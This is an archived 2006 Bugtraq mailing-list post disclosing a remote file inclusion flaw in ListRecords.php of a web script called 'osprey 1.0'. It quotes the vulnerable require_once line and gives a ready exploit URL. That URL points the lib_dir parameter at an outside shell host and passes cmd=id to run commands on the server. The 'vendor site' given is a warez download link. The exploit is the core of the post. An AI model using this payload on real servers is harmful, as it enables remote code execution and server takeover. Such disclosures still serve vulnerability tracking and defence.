osprey 1.0 (ListRecords.php) Remote File Include Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: osprey 1.0 (ListRecords.php) Remote File Include Vulnerability
From: KaBaRa.HaCk.eGy@xxxxxxxxx
Date: 16 Oct 2006 20:05:05 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

#==============================================================================================
# osprey 1.0 (ListRecords.php)  Remote File Include Vulnerability
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://warez.gtasoft.ru/skripts/p4CMS.v1.05.Nullified-WTN.rar   
   
#                                                                               
                                   
#
#================================================================================================
 
#Bug in : ListRecords.php
#
#Vlu Code :
#--------------------------------
#
#                    


require_once($lib_dir .'Document.class.php');
#                    
#                    
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script 
Path]/ListRecords.php?lib_dir=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
 
#Discoverd By : KaBaRa.HaCk.eGy
#
#Conatact : KaBaRa.HaCk.eGy[at]hotmail.com
#
#GreetZ : eGypT.GHosT - ToOoFa - LeCoPrA - MaHmooD_ali - MoHandKo - The_Sniper 
- Broken-broxy - abdoullaH00
# AND My BroTherS Turkish HaCkeRs--> HaCkerfreeze &  My Turkish TeaM--> BelGium 
SeCurity FoR My BrO ..MeRtXx..
# Special Thx To : TryaG.CoM & AsbMay.NeT
==================================================================================================

Prev by Date: [ GLSA 200610-04 ] Seamonkey: Multiple vulnerabilities
Next by Date: iDefense Security Advisory 10.15.06: Clam AntiVirus ClamAV CHM Chunk Name Length DoS Vulnerability
Previous by thread: [ GLSA 200610-04 ] Seamonkey: Multiple vulnerabilities
Next by thread: iDefense Security Advisory 10.15.06: Clam AntiVirus ClamAV CHM Chunk Name Length DoS Vulnerability
Index(es):
- Date
- Thread